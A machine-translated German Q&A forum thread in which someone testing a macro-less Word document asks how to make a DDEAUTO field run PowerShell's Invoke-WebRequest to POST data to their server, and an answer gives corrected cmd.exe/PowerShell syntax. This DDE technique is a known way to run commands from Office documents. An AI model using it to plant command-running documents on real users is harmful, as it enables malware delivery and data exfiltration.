Senden von Postdaten über DDEAUTO MS Word

Question

Ich mache ein paar Tests und möchte ein macroloses Word-Dokument erhalten, um einen Ping-Befehl an meinen Server zu senden.

Ich weiß, es wurde zuvor durch eine Nutzlast (siehe https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/) getan, aber das Ziel hier wäre nicht mehr als eine Anfrage auszuführen.

Mein Ziel hier wäre etwas entlang der Linien laufen von:

Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':'word', 'id':1}" 

vom DDEAUTO Befehl (https://msdn.microsoft.com/en-us/library/ff531181(v=office.12).aspx).

Ich habe versucht, die Ausführung von Powershell durch cmd, Power direkt und verwalten brachte keine Ergebnisse

bekommen ich etwas entlang der Linien von erwartet hätte:

DDEAUTO c:\\Windows\\System32\\cmd.exe "powershell -e Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':3661515, 'Name':'test'}"" \p 

zu arbeiten, aber es doesn scheint nicht der Fall zu sein.

Vielen Dank!

Answer 1

Sie sollten so etwas wie verwenden,

/k die Befehlszeile offen halten, nachdem sie den Befehl ausführt. Fühlen Sie sich frei, dies zu entfernen, wenn Sie das cmd wollen

-command automatisch nach Befehl zum Schließen Befehl angeben

{} Hash-Tabelle keine Notwendigkeit auf diese in Anführungszeichen

{Schlüssel: Wert; Schlüssel: Wert} die ; ist der Separator kein,

cmd.exe "/k powershell -command Invoke-WebRequest -UseBasicParsing http://google.com -ContentType 'application/json' -Method POST -Body { Item:3661515; Name:'test'}"